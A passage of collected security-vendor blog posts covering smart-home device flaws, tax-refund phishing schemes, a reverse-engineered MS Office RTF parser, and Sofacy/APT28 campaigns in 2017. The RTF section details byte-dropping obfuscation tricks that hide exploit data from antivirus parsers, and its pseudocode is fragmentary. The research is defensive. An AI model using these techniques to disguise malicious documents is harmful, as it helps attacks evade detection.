Thus, the few steps involved with generating and sending the right requests to the server can provide remote attackers with the possibility of downloading data to access the user’s web interface account, which doesn’t have any additional security layers, such as 2FA (Two Factor Authentication). As a result, attackers can take control over someone’s home and turn off the lights or water, or, even worse, open the doors. So, one day, someone’s smart life could be turned into a complete nightmare. We reported all the information about the discovered vulnerabilities to the vendor, which are now being fixed.

But there is always light at the end of the tunnel…

In addition to smart “boxes”, we had something smaller in our pocket – a smart light bulb, which doesn’t have any critical use, neither for safety or security. However, it also surprised us with a few – but still worrying – security issues.

The smart bulb is connected to a Wi-Fi network and controlled over a mobile application. To set it up a user needs to first download the mobile application (iOS or Android), switch on the bulb, connect to the Wi-Fi access point created by the bulb and provide the bulb with the SSID and password from a local Wi-Fi network.

From the application, users can switch it ON and OFF, set timers and change different aspect of the light, including its density and color. Our goal was to find out if the device might help an attacker in any way to gain access to a local network, from which it would eventually be possible to conduct an attack.

After several attempts, we were lucky to discover a way to get to the device’s firmware through the mobile application. An interesting fact is that the bulb does not interact with the mobile application directly. Instead, both the bulb and the mobile application are connected to a cloud service and communication goes through it. This explains why while sniffing the local network traffic, almost no interaction between the two were found.

We discovered that the bulb requests a firmware update from the server and downloads it through an HTTP protocol that doesn’t secure the communication with servers. If an attacker is in the same network, a man-in-the-middle kind of attack will be an easy task.

The hardware reconnaissance with flash dumping led us not only to the firmware, but to user data as well. With a quick look at the information shared with the cloud, no sensitive information seems to have been uploaded from the device or the internal network. But we found all the credentials of the Wi-Fi networks to which the bulb had connected before, which are stored in the device’s flash forever with no encryption – even after a “hard” reset of the device this data was still available. Thus, reselling it on online market places is certainly not a good idea.

Get ready

Our latest research has once again confirmed that ‘smart home’ doesn’t mean ‘secure home’. Several logical vulnerabilities (combined with an unconsciously published serial number) can literally open doors to your home and welcome in cybercriminals. Besides this, remote access and control over your smart hub can lead to a wide range of sabotage activities, which could cost you through high electricity bills, a flood or, even more importantly, your mental health.

But even if your smart hub is secure, never forget that the devil is in the details: a tiny thing such as a light bulb could serve as an entry-point for hackers as well, providing them with access to a local network.

That’s why it’s highly important for users to follow these simple cyber hygiene rules:

  • Always change the default password. Instead use a strict and complex one. Don’t forget to update it regularly.
  • Don’t share serial numbers, IP addresses and other sensitive information regarding your smart devices on social networks
  • Be aware and always check the latest information on discovered IoT vulnerabilities.

No less important is that vendors should improve and enhance their security approach to ensure their devices are adequately protected and, as a result, their users. In addition to a cybersecurity check, which is just as vital as testing other features before releasing a product, it is necessary to follow IoT cybersecurity standards. Kaspersky Lab has recently contributed to the ITU-T (International Telecommunication Union — Telecommunication sector) Recommendation, created to help maintain the proper protection of IoT systems, including smart cities, wearable and standalone medical devices and many others.

Tax refund, or How to lose your remaining cash

Thu, 02/22/2018 - 05:00

Every year, vast numbers of people around the globe relish the delightful prospect of filling out tax returns, applying for tax refunds, etc. Given that tax authorities and their taxpayers are moving online, it’s no surprise to find cybercriminals hard on their heels. By spoofing trusted government agency websites and luring users onto them, phishers try to collect enough information to steal both money from victims’ accounts and their digital identity.

Attackers employ standard methods that basically center on creating phishing sites and web pages. Such resources can prompt for passwords to My Account areas on the websites of local tax services, answers to security questions, names and dates of birth of relatives, information about bank cards, and much more besides. In addition to information that users themselves unwittingly hand over, scammers often get hold of extra tidbits such as victim IP address and location, browser name and version, operating system. That is, anything that increases the chances of a successful bypass of the protection system into the victim’s accounts.

Phishing pages can also spread malware under various guises. Fraudsters don’t shy away from direct extortion under the cloak of tax agents — such attacks have occurred in the US, France, Canada, Ireland, and elsewhere. Let’s examine the most common tax-phishing schemes in more detail.

Canada (CRA)

In Canada, the body responsible for tax collection and administration is the Canadian Revenue Agency (CRA). The deadline for filing tax returns for the past financial year is April 30. The figure below shows phishing activity in 2016 spiking in the days leading up to this deadline, and only abating in May.

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites using the CRA brand, 2016

A slightly different picture is observed on the 2017 graph:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites using the CRA brand, 2017

A surge came when many Canadians were expecting a tax refund of some sort. We registered a huge number of phishing pages informing people that they were entitled to receive a certain amount of money. It was mostly these messages that distributed links to fake CRA pages where victims were asked to fill out a web form.

Example of a phishing letter allegedly from the CRA with a fake notification about a potential refund.

Typically, such pages are almost a carbon copy of the official CRA site and request a large amount of personal information. If the user doesn’t doubt the site’s authenticity, he or she will have no qualms about filling in the many fields. As a result, the attackers get hold of valuable information, while users are notified of a two-day wait while their data is “processed.” For added plausibility, the victim can be redirected to the original CRA site.

Among the information that the fraudsters collect are bank card details (including PIN code), social security number, driver’s license number, address, telephone number, date of birth, mother’s maiden name, and employer. The attackers also retrieve the IP address and system information.

Example of a phishing page masquerading as a CRA site. When all personal information is entered and the form is submitted, the script generates an email with all the data input (as well as the victim’s IP address and data received from the User Agent) and sends it to the specified address

Criminals do not focus solely on tax declarations and refunds. They make repeated attempts throughout the year to extract data under the guise of the CRA. For example, one of the emails we found invited the recipient to view information about a “tax incident,” prompting them to enter a login and password for a Dropbox account, or provide email credentials. After that, the victim clicked a button to download a public PDF document with information about alleged changes to the tax legislation. The data entered was forwarded to the scammers.

Example of tax and CRA-themed phishing to get Dropbox and mail credentials

Scammers do not restrict themselves to fake sites and emails. They also send out SMS messages and even call victims pretending to be from the CRA, demanding urgent payment of debts by wiring money to a certain account. Such calls are often accompanied by intimidation (threats of penalties, fines, and even imprisonment are used).

Taxpayers in Canada should remember that the CRA never sends emails containing links or requests for personal data, except when an email is sent directly during a telephone conversation with a CRA agent.

CRA recommendations on how to avoid scams are available on its official site under Security.

United States (IRS)

In the US, the tax body is the Internal Revenue Service (IRS), and the tax return deadline is usually April 18 (the date may vary slightly from year to year). In 2016, as in Canada, a major fraud outbreak occurred in the run-up to the deadline:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites using the IRS brand, 2016

However, we observed bursts of scamming activity throughout the year. That made it difficult to single out a specific moment in 2017, save for a notable pre-New Year spike:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites using the IRS brand, 2017

Scammers use a range of topics to bait US taxpayers: tax refund, personal information update, account confirmation, etc.

Examples of fake IRS emails

Tax refund forms are a very popular tool for phishers in the US, and scam sites that exploit this method typically appear at the start of the tax return period. The amount of data they steal is staggering: anything they can and more besides. They exploit users’ very strong urge to claw back some of their hard-earned cash.

Fake IRS pages prompting users to fill out a tax refund form

An information leak on this scale might not only empty the victim’s bank accounts, but lead to a host of other problems, including targeted attacks and attempts to access other accounts. Whereas a compromised bank card is easily blocked and reissued, one’s address, social security number, date of birth, and mother’s maiden name are rather less flexible.

Another way to dupe victims is to send a fake tax service message containing a link to confirm their account, update personal information, or restore their password:

Examples of phishing pages using the IRS brand

After the data is forwarded to the scammers, the victim is usually redirected to the original site not to arouse suspicions:

Example of a phishing script sending user data to a fraudulent email address. If the information is successfully forwarded, the victim is redirected to the original tax service website

Besides the IRS brand, scammers use the name of Intuit, the developer of the TurboTax program, which helps fill out tax returns.

Example of a phishing email using the Intuit brand

Scammers try to get user credentials for the Intuit site, as well as email logins and passwords:

Examples of phishing pages using the Intuit brand

Links to phishing pages in the US are distributed not only by email, but by SMS and social media. Remember that the IRS doesn’t initiate contact with taxpayers through these channels to request personal information.

Official IRS anti-phishing recommendations are available on the department’s website..

United Kingdom (HMRC)

The UK tax (fiscal) year runs from April 6 through April 5 the following year. The PAYE (Pay As You Earn) system means that most taxpayers are not required to fill out any forms by a certain deadline (HMRC receives monthly data from the employer). However, if a taxpayer’s income changes, he/she must update their tax code in accordance with the new income level. And in the event that the taxpayer owes money or is due a reimbursement, HMRC (Her Majesty’s Revenue and Customs) will make contact to arrange payment. That’s where scammers set traps informing potential victims about a potential refund or (less often) monies owed.

In 2016, phishing activity in this segment in the UK was very high, rising toward the end of the calendar year:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites exploiting the name of the UK’s HMRC, 2016

In 2017, phishers cast their nets in May (this month saw two major outbreaks of activity) and remained active pretty much until the end of the calendar year.

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites exploiting the name of the UK’s HMRC, 2017

Scam emails supposedly from HMRC are sent to UK residents via SMS, social media, and email, and contain links to phishing pages that strongly resemble the official website. To claim their “refund,” users are usually asked to enter bank card details and other important information.

Examples of phishing pages using the HMRC brand.

In addition, scammers try to steal credentials for other services. In the example below, the scammers sent an email seemingly from HMRC with a PDF attachment (in fact an HTML file). On opening it, the user is shown a page in the style of an Adobe online resource, and is prompted for an email login and password to view the PDF. These credentials are, of course, sent to the attackers.

A fake PDF directing victims to a page used by cybercriminals to steal email account credentials

Anti-phishing recommendations can be viewed on the official HMRC website.

France (DGFiP,

In France, tax collection is the responsibility of the General Directorate of Public Finance (La Générale des finances publique, DGFiP); the start of the fiscal year coincides with that of the calendar year. The French have no PAYE system (one is planned for implementation in 2019), and the deadline for tax returns is set by each individual département. Tax declarations can be filed in paper form (soon to be discontinued) and online. What’s more, the paper deadline is earlier than the electronic one. Generally, the submission deadlines fall in May-June.

As we can see on the graphs, phishing activity surged during this very period:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to fake DGFiP phishing sites, 2016

2017 saw two flashes of activity: during the filing period and at the end of the year:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to fake DGFiP phishing sites, 2017

The most popular topic for scammers, as before, is the offer of a refund:

Example of a phishing email exploiting the subject of tax refunds

Clicking on links in such messages takes users to phishing pages where they are prompted to enter bank card details and other personal information:

Examples of fake pages masquerading as the French tax service

Official warning about scammers on the DGFiP website.

Other countries

Taxes are a common scamming topic in other countries, too. Personal information is solicited for under various pretexts: tax return completion, account verification, tax refund, system registration, etc.

Example of a fake page of the Revenue Commissioners of the Republic of Ireland

Scammers not only target taxpayers’ personal data, but sometimes aim to install malware on their computers. For example, one spam mailing contained a link to a fake site of the Federal Tax Service (FTS) of the Russian Federation, where a Trojan was downloaded to the victim’s computer.

A spoof FTS site distributing malware

Not only taxes

Posing as the state, attackers have other topics than taxes up their sleeve. For example, scammers in Hungary held fake prize giveaways in the name of the government:

Smartphone giveaway by the “Hungarian government”

In Italy, fraudsters rather ingeniously extorted money under the guise of the Ministry of Defense. To conceal its real address, the site opened (if the user allowed it) in full-screen mode with the control elements and address bar hidden, and then proceeded to simulate these interface elements. Naturally, the fake address bar displayed the Ministry’s legitimate URL.

Fake Italian “Ministry of Defense” website

Scaring users into thinking they had distributed prohibited materials (pornography, pedophilia, zoophilia), the site blocked the computer and demanded a fine in the form of a €500 iTunes gift card to have it unblocked.


Trust in government websites is very high, and filing of tax returns always involves submitting large quantities of personal information. Therefore, if users are sure that they are on the official tax service website, they will not hesitate to share important details about themselves. Another important aspect is that many online tax return filers are not everyday netizens, and thus know little about online fraud and cannot recognize a scam when they see one. But even regular Internet users can be wrong-footed by a tempting (and often expected) tax refund notice. Scammers take full advantage of this. In sum, always treat monetary offers with a healthy dollop of skepticism, and bookmark the official site of your country’s tax service in your browser to help avoid getting hooked by phishers.

Disappearing bytes: Reverse engineering the MS Office RTF parser

Wed, 02/21/2018 - 09:00

Microsoft Office was a prime target for attacks in 2017. As well as the large number of vulnerabilities discovered and proof-of-concept exploits published, malware authors felt it necessary to prevent detection of ‘one-day’ and ‘old-day’ exploits by antivirus software. It also became clear that using RTF parsing features and peculiarities are no longer enough to effectively evade detection. Along with the rise of MS Office exploitation, when RTF is used as a container for an exploit, we encountered lots of samples that were ‘exploiting’ the implementation of Microsoft Word’s RTF parser to confuse all other third-party RTF parsers, including those used in AV software.

To achieve parsing exactly like that in MS Office, we needed to reverse-engineer it.

I decided to look first at MS Office 2010, because when it comes to parsing it’s better to look at an older implementation. I then compared my findings with those found in newer versions.

An RTF parser comprises a state machine with 37 states, 22 of which are unique:

We’ll look at the most significant states and those that have an influence on the parsing of \objdata, a destination control word that contains the object data. Microsoft OLE links, Microsoft OLE embedded objects, and Macintosh Edition Manager subscriber objects are represented in RTF as objects. These states are:



       PARSER_BEGIN = 0,








       PARSER_END_GROUP = 0x10,

       // …


Microsoft Office is shipped without debug symbols, meaning it wasn’t possible to recover the original state names. However, I believe I’ve chosen suitable names according to their underlying functionality.

The first state executed on an opened RTF file is PARSER_BEGIN. In most cases, it’s also executed after processing a control word. The main goal of this state is to determine the next state according to encountered char, destination, and other values stored in the ‘this’ structure and set by control word processors. By default the next state is PARSER_CHECK_CONTROL_WORD.



        // … – checks that we dont need


        while (data.pos != data.end)


                byte = *(uint8_t*)data.pos;




                if (this->bin_size > 0)


                        goto unexpected_char;



                // …


                if (byte == 9)


                        // …





                if (byte == 0xA || byte == 0xD)


                        // …





                if (byte == ‘\\’)


                        uint8_t byte1 = *(uint8_t*)data.pos;


                        if (byte1 == ‘\”)


                               if (this->destination == listname ||

                                       this->destination == fonttbl ||

                                       this->destination == revtbl ||

                                       this->destination == falt ||

                                       this->destination == leveltext ||

                                       this->destination == levelnumbers ||

                                       this->destination == liststylename ||

                                       this->destination == protusertbl ||

                                       this->destination == lsdlockedexcept)

                                       goto unexpected_char;


                               state = PARSER_CHECK_CONTROL_WORD;


                               // …





                        if (byte1 == ‘u’)


                               // …





                        state = PARSER_CHECK_CONTROL_WORD;


                        // …





                if (byte == ‘{‘)




                        // …





                if (byte == ‘}’)


                        state = PARSER_END_GROUP;





                // it will set next state depending on destination / or go to unexpected_cmd to do more checks and magic


                // …


                if (this->destination == pict ||

                        this->destination == objdata ||

                        this->destination == objalias ||

                        this->destination == objsect ||

                        this->destination == datafield ||

                        this->destination == fontemb ||

                        this->destination == svb ||

                        this->destination == macro ||

                        this->destination == tci ||

                        this->destination == datastore ||

                        this->destination == mmconnectstrdata ||

                        this->destination == mmodsoudldata ||

                        this->destination == macrosig)


                        state = PARSER_PARSE_HEX_DATA;





                // …






PARSER_CHECK_CONTROL_WORD will check if the next char is the start of a control word or if it’s a control symbol, and will set the next state accordingly.



        byte = *(uint8_t*)data.pos;


        if ((byte >= ‘a’ && byte <= ‘z’) || (byte == ‘ ‘) || (byte >= ‘A’ && byte <= ‘Z’))


                state = PARSER_PARSE_CONTROL_WORD;

                this->cmd_len = 0;





                this->temp[0] = 1;

                this->temp[1] = byte;

                this->temp[2] = 0;

                state = PARSER_PROCESS_CMD;

                this->cmd_len = 1;



The states PARSER_PARSE_CONTROL_WORD and PARSER_PARSE_CONTROL_WORD_NUM_PARAMETER will store the null-terminated control word that is made up of ASCII alphabetical characters and a null-terminated numeric parameter (if it exists) in a temporary buffer of a fixed size.



        pos = this->temp + 1;

        parsed = this->temp + 1;


        while (data.pos != data.end)


                byte = *(uint8_t*)data.pos;


                // length of null-terminated strings cmd + num should be <= 0xFF


                if ((byte == ‘-‘) || (byte >= ‘0’ && byte <= ‘9’))


                        //if parsed == temp_end

                        // goto raise_exception


                        *parsed = 0;


                        pos = parsed;


                        if (parsed >= temp_end)


                               parsed = temp_end – 1;


                               *parsed = 0;

                               state = PARSER_PROCESS_CMD;


                               this->cmd_len = pos – (this->temp + 1);






                        this->cmd_len = pos – (this->temp + 1);


                        *parsed = byte;


                        pos = parsed;


                        state = PARSER_PARSE_CONTROL_WORD_NUM_PARAMETER;




                if (byte == ‘ ‘)




                        if (parsed >= temp_end)


                               parsed = temp_end – 1;



                        *parsed = 0;

                        state = PARSER_PROCESS_CMD;


                        this->cmd_len = pos – (this->temp + 1);




                if ((byte >= ‘a’ && byte <= ‘z’) || (byte >= ‘A’ && byte <= ‘Z’))


                        if (parsed – this->temp >= 0xFF)


                               if (parsed >= temp_end)


                                       parsed = temp_end – 1;



                               *parsed = 0;

                               state = PARSER_PROCESS_CMD;


                               this->cmd_len = pos – (this->temp + 1);




                        //if parsed == temp_end

                        // goto raise_exception


                        *parsed = byte;


                        pos = parsed;







                        if (parsed >= temp_end)


                               parsed = temp_end – 1;



                        *parsed = 0;

                        state = PARSER_PROCESS_CMD;


                        this->cmd_len = pos – (this->temp + 1);









        while (data.pos != data.end)


                byte = *(uint8_t*)data.pos;


                // length of null-terminated strings cmd + num should be <= 0xFF


                if (byte == ‘ ‘)




                        if (parsed >= temp_end)


                               parsed = temp_end – 1;



                        *parsed = 0;

                        state = PARSER_PROCESS_CMD;




                if (byte >= ‘0’ && byte <= ‘9’)


                        if (parsed – this->temp >= 0xFF)


                               if (parsed >= temp_end)


                                       parsed = temp_end – 1;



                               *parsed = 0;

                               state = PARSER_PROCESS_CMD;




                        //if parsed == temp_end

                        // goto raise_exception


                        *parsed = byte;








                        if (parsed >= temp_end)


                               parsed = temp_end – 1;



                        *parsed = 0;

                        state = PARSER_PROCESS_CMD;

















        this->state = state;


        state = this->state;



Then it is processed in the state PARSER_PROCESS_CMD that calls another function responsible for processing control words and control symbols. It takes into account the current state and sets the next state.

There are multiple states responsible for parsing hex-data. The most interesting for us is PARSER_PARSE_HEX_DATA – as you can see, it’s set in PARSER_BEGIN if the destination objdata is set.



        parsed_data = this->temp;


        if (this->bin_size <= 0)


                while (data.pos != data.end)


                        byte = *(uint8_t*)data.pos;


                        if (byte == ‘{‘ || byte == ‘}’ || byte == ‘\\’)


                               state = PARSER_BEGIN;


                               if (parsed_data != this->temp)


                                       push_data(parsed_data – this->temp);

                                       parsed_data = this->temp;






                        if (this->flag & 0x4000)






                        if (byte >= ‘0’ && byte <= ‘9’)


                               val = byte – 0x30;



                        else if (byte >= ‘a’ && byte <= ‘f’)


                               val = byte – 0x57;



                        else if (byte >= ‘A’ && byte <= ‘F’)


                               val = byte – 0x37;



                        else if (byte == 9 || byte == 0xA || byte == 0xD || byte == 0x20)








                               // show message that there are not enough memory

                               this->flag |= 0x4000;





                        if (this->flag & 0x8000)


                               this->hex_data_byte = val << 4;

                               this->flag &= 0x7FFF;





                               if (parsed_data == temp_end)



                                       parsed_data = this->temp;



                               this->hex_data_byte |= val;


                               *parsed_data = this->hex_data_byte;



                               this->flag |= 0x8000;








                if (this->flag & 0x4000)


                        uint32_t size;

                        if (this->bin_size <= data.end – data.pos)


                               size = this->bin_size;




                               size = data.end – data.pos;



                        this->bin_size -= size;

                        data.pos += size;




                        while (this->bin_size > 0)


                               if (parsed_data == temp_end)



                                       parsed_data = this->temp;



                               byte = *(uint8_t*)data.pos;


                               *parsed_data = byte;









        if (parsed_data != this->temp)


                push_data(parsed_data – this->temp);

                parsed_data = this->temp;




This state will parse hexadecimal data and binary data if set.

The states PARSER_PARSE_HEX_NUM_MSB and PARSER_PARSE_HEX_NUM_LSB are used together to parse hex values (data of the \panose control word and \’ control symbol).



        this->flag |= 0x8000;


        this->hex_num_byte = 0;


        state = PARSER_PARSE_HEX_NUM_LSB;




        //  …


        byte = *(uint8_t*)data.pos;



        val = 0;

        if (byte – ‘0’ <= 9)


                val = byte – 0x30;


        else if (byte – ‘a’ <= 5)


                val = byte – 0x57;


        else if (byte – ‘A’ <= 5)


                val = byte – 0x37;



        this->hex_num_byte |= val << ((this->flag >> 0xF) << 2);


        this->flag = ((~this->flag  ^ this->flag) & 0x7FFF) ^ ~this->flag;


        if (this->flag & 0x8000)


                // …


                state = PARSER_BEGIN;








State reset

Looking at PARSER_PARSE_HEX_NUM_MSB, PARSER_PARSE_HEX_NUM_LSB and PARSER_PARSE_HEX_DATA, it is easy to spot a bug. Even if they use a different variable to store the decoded hex value, they use the same bit to determine which nibble is now decoded – high (most significant bits, or MSB) or low (less significant bits, or LSB). And PARSER_PARSE_HEX_NUM_MSB always resets this bit to MSB.

It is therefore possible to make bytes disappear in the PARSER_PARSE_HEX_DATA context by triggering a change of state to PARSER_PARSE_HEX_NUM_MSB.

For this to work it is enough to put \’XX in the data that comes after the \objdata control word. In this case, when the parser encounters \ in state PARSER_PARSE_HEX_DATA it will return to state PARSER_BEGIN and after that will go to state PARSER_PROCESS_CMD. The handler for the \’ control symbol will not change a destination, but will change the next state to PARSER_PARSE_HEX_NUM_MSB. After PARSER_PARSE_HEX_NUM_MSB and PARSER_PARSE_HEX_NUM_LSB control is transferred back to PARSER_BEGIN and eventually to PARSER_PARSE_HEX_DATA because the destination is still equal to objdata. After all that, the next byte will be decoded as a high nibble.

It is also worth noting that PARSER_PARSE_HEX_NUM_LSB does not check if the provided value is a valid hexadecimal; therefore, after \’ there could be absolutely any two bytes.

This behavior can be observed in the following example:

“f\’cc” will be removed from the final result

When control is transferred for the first time to the PARSER_PARSE_HEX_DATA state, after the \objdata control word is processed, the MSB bit is already set. Let’s look at how it happens and how this example will be processed:

After some reverse engineering of the keyword processing function, I found a list of all the control words and their corresponding structures:

With this information we can locate and look at the objdata constructor:

You can see it sets the MSB bit, allocates a new buffer and replaces the old pointer with a new one. Therefore, the data decoded between two \objdata control words is never used.

“d0cf11e0a1b11ae1” will be removed from the final result

Final destination

We know that if \’ or \objdata is put in data, it will change the output. What about other control words and control symbols? There are more than 1500 of them!

Mostly nothing.

As some control words represent a destination, they can’t be used – they change the objdata destination on their own, and to decode an object the objdata destination is needed.

Other control words do not affect objdata destination.

The only one way to change the destination so that it’s possible to return to the objdata destination without losing previously decoded data is to use special symbols – opening brace ({) and closing brace (}). These symbols indicate the start and end of a group.

When the parser encounters the end of a group in state PARSER_BEGIN, the destination that was set before the start of the group will be restored.

Therefore, by putting {\aftncn FF} after \objdata, FF will not get into the decoded data because FF now applies to the destination aftncn and will be handled according to this destination.

However, by using {\aftnnalc FF}, FF will get into the decoded data because the destination is still equal to objdata.

It is also worth noting that {\objdata FF} still can’t be used because the buffer will not be restored.

An accurate list of all destination control words was created with a simple fuzzer.

Fixed-size buffer

Another obfuscation technique that comes to mind while looking at the code of an RTF parser is not related to this ‘MSB’ bug, but can also be used to remove bytes from a hex-stream. The technique’s related to the temporary buffer size and how a control word and numeric parameter are parsed in the states PARSER_PARSE_CONTROL_WORD and PARSER_PARSE_CONTROL_WORD_NUM_PARAMETER. You can see an example of its use in the following screenshot.

In this example the size of the data that will be removed as part of the numeric parameter is calculated using the formula: 0xFF (size of temporary buffer) – 0xB (size of ‘oldlinewrap’) – 2 (null-terminator characters) = 0xF2.

Unnecessary data

While the techniques described above are related to general RTF parsing, the processing of some specific keywords conceals some further confusion.

According to the specification states, if \* was encountered right before a control word or control symbol that was not found in the lookup table, its considered an unknown destination group and all the data up to the closing brace } that closes this group should be discarded. The lookup table in MS Office contains control words that are not present in the specification and it raises concerns that it will be changed in future, affecting parsing of the same document on different versions of MS Office. When the function responsible for processing keywords encounters such cases or one of the specific control words (such as \comment, \generator, \nonshppict and so on), it will set the state PARSER_SKIP_DATA and the number for encountered opening braces { to 1.



       // …

       PARSER_SKIP_DATA = 0xF,

       // …






       // …


Kind of magic

During analysis of the PARSER_SKIP_DATA* states I found things that are the opposite not only to the specification but also to the rest of the parser code.

While looking for the \bin control word, this states will skip data, changing the number of encountered opening and closing braces until that number equals zero. The hidden catch lies in the way the numeric parameter is processed.

First of all, the maximum allowed length of the numeric parameter is increased up to 0xFF – it’s calculated without considering the length of the control word.

The second catch is that the numeric parameter is not numeric anymore! The parser allows not only decimal characters but also Latin characters to pass. Then this parameter is passed to custom strtol, making it possible to specify the length of data that should be skipped without considering opening and closing braces as a hexadecimal number.

Obfuscations with the use of these two primitives have not yet been encountered in the wild.


Reverse engineering has proved to be the most effective way to build a parser, and in the case of RTF it would most likely be impossible to achieve the desired behavior otherwise.

Exact parsing depends on small implementation details and algorithmic bugs rather than on a specification that could be confusing or state things that are not true.

Kaspersky Lab products detect all kinds of RTF obfuscation and perform the most correct processing of RTF files, providing the best protection to our end users.

A Slice of 2017 Sofacy Activity

Tue, 02/20/2018 - 09:00

Sofacy, also known as APT28, Fancy Bear, and Tsar Team, is a highly active and prolific APT. From their high volume 0day deployment to their innovative and broad malware set, Sofacy is one of the top groups that we monitor, report, and protect against. 2017 was not any different in this regard. Our private reports subscription customers receive a steady stream of YARA, IOC, and reports on Sofacy, our most reported APT for the year.

This high level of cyber-espionage activity goes back years. In 2011-2012, the group used a relatively tiny implant (known as “Sofacy” or SOURFACE) as their first stage malware, which at the time had similarities with the old Miniduke implants. This made us believe the two groups were connected, although it looks they split ways at a certain point, with the original Miniduke group switching to the CosmicDuke implant in 2014. The division in malware was consistent and definitive at that point.

In 2013, the Sofacy group expanded their arsenal and added more backdoors and tools, including CORESHELL, SPLM (aka Xagent, aka CHOPSTICK), JHUHUGIT (which is built with code from the Carberp sources), AZZY (aka ADVSTORESHELL, NETUI, EVILTOSS, and spans across 4-5 generations) and a few others. We’ve seen quite a few versions of these implants, which were relatively widespread at some point or still are. In 2015 we noticed another wave of attacks which took advantage of a new release of the AZZY implant, largely undetected by antivirus products. The new wave of attacks included a new generation of USB stealers deployed by Sofacy, with initial versions dating to February 2015. It appeared to be geared exclusively towards high profile targets.

Sofacy’s reported presence in the DNC network alongside APT29 brought possibly the highest level of public attention to the group’s activities in 2016, especially when data from the compromise was leaked and “weaponized”. And later 2016, their focus turned towards the Olympics’ and the World Anti-Doping Agency (WADA) and Court of Arbitration for Sports (CAS), when individuals and servers in these organizations were phished and compromised. In a similar vein with past CyberBerkut activity, attackers hid behind anonymous activist groups like “anonpoland”, and data from victimized organizations were similarly leaked and “weaponized”.

This write-up will survey notables in the past year of 2017 Sofacy activity, including their targeting, technology, and notes on their infrastructure. No one research group has 100% global visibility, and our collected data is presented accordingly. Here, external APT28 reports on 2017 Darkhotel-style activity in Europe and Dealer’s Choice spearphishing are of interest. From where we sit, 2017 Sofacy activity starts with a heavy focus on NATO and Ukrainian partners, coinciding with lighter interest in Central Asian targets, and finishing the second half of the year with a heavy focus on Central Asian targets and some shift further East.

Dealer’s Choice

The beginning of 2017 began with a slow cleanup following the Dealer’s Choice campaign, with technical characteristics documented by our colleagues at Palo Alto in several stages at the end of 2016. The group spearphished targets in several waves with Flash exploits leading to their carberp based JHUHUGIT downloaders and further stages of malware. It seems that many folks did not log in and pull down their emails until Jan 2017 to retrieve the Dealer’s Choice spearphish. Throughout these waves, we observed that the targets provided connection, even tangential, to Ukraine and NATO military and diplomatic interests.

In multiple cases, Sofacy spoofs the identity of a target, and emails a spearphish to other targets of interest. Often these are military or military-technology and manufacturing related, and here, the DealersChoice spearphish is again NATO related:

The global reach that coincided with this focus on NATO and the Ukraine couldn’t be overstated. Our KSN data showed spearphishing targets geolocated across the globe into 2017.

DealersChoice emails, like the one above, that we were able to recover from third party sources provided additional targeting insight, and confirmed some of the targeting within our KSN data:

0day Deployment(s)

Sofacy kicked off the year deploying two 0day in a spearphish document, both a Microsoft Office encapsulated postscript type confusion exploit (abusing CVE-2017-0262) and an escalation of privilege use-after-free exploit (abusing CVE-2017-0263). The group attempted to deploy this spearphish attachment to push a small 30kb backdoor known as GAMEFISH to targets in Europe at the beginning of 2017. They took advantage of the Syrian military conflict for thematic content and file naming “Trump’s_Attack_on_Syria_English.docx”. Again, this deployment was likely a part of their focus on NATO targets.

Light SPLM deployment in Central Asia and Consistent Infrastructure

Meanwhile in early-to-mid 2017, SPLM/CHOPSTICK/XAgent detections in Central Asia provided a glimpse into ongoing focus on ex-Soviet republics in Central Asia. These particular detections are interesting because they indicate an attempted selective 2nd stage deployment of a backdoor maintaining filestealer, keylogger, and remoteshell functionality to a system of interest. As the latest revision of the backdoor, portions of SPLM didn’t match previous reports on SPLM/XAgent while other similarities were maintained. SPLM 64-bit modules already appeared to be at version 4 of the software by May of the year. Targeting profiles included defense related commercial and military organizations, and telecommunications.

Targeting included TR, KZ, AM, KG, JO, UK, UZ

Heavy Zebrocy deployments

Since mid-November 2015, the threat actor referred to as “Sofacy” or “APT28” has been utilizing a unique payload and delivery mechanism written in Delphi and AutoIT. We collectively refer to this package and related activity as “Zebrocy” and had written a few reports on its usage and development by June 2017 – Sofacy developers modified and redeployed incremented versions of the malware. The Zebrocy chain follows a pattern: spearphish attachment -> compiled Autoit script (downloader) -> Zebrocy payload. In some deployments, we observed Sofacy actively developing and deploying a new package to a much smaller, specific subset of targets within the broader set.

Targeting profiles, spearphish filenames, and lures carry thematic content related to visa applications and scanned images, border control administration, and various administrative notes. Targeting appears to be widely spread across the Middle East, Europe, and Asia:</p style=”margin-bottom:0!important”>

  • Business accounting practices and standards
  • Science and engineering centers
  • Industrial and hydrochemical engineering and standards/certification
  • Ministry of foreign affairs
  • Embassies and consulates
  • National security and intelligence agencies
  • Press services
  • Translation services
  • NGO – family and social service
  • Ministry of energy and industry

We identified new MSIL components deployed by Zebrocy. While recent Zebrocy versioning was 7.1, some of the related Zebrocy modules that drop file-stealing MSIL modules we call Covfacy were v7.0. The components were an unexpected inclusion in this particular toolset. For example, one sent out to a handful of countries identifies network drives when they are added to target systems, and then RC4-like-encrypts and writes certain file metadata and contents to a local path for later exfiltration. The stealer searches for files 60mb and less with these extensions:</p style=”margin-bottom:0!important”>

  • .doc
  • .docx
  • .xls
  • .xlsx
  • .ppt
  • .pptx
  • .exe
  • .zip
  • .rar

At execution, it installs an application-defined Windows hook. The hook gets windows messages indicating when a network drive has been attached. Upon adding a network drive, the hook calls its “RecordToFile” file stealer method.

Zebrocy spearphishing targets:

SPLM deployment in Central Asia

SPLM/CHOPSTICK components deployed throughout 2017 were native 64-bit modular C++ Windows COM backdoors supporting http over fully encrypted TLSv1 and TLSv1.2 communications, mostly deployed in the second half of 2017 by Sofacy. Earlier SPLM activity deployed 32-bit modules over unencrypted http (and sometimes smtp) sessions. In 2016 we saw fully functional, very large SPLM/X-Agent modules supporting OS X.

The executable module continues to be part of a framework supporting various internal and external components communicating over internal and external channels, maintaining slightly morphed encryption and functionality per deployment. Sofacy selectively used SPLM/CHOPSTICK modules as second stage implants to high interest targets for years now. In a change from previous compilations, the module was structured and used to inject remote shell, keylogger, and filesystem add-ons into processes running on victim systems and maintaining functionality that was originally present within the main module.

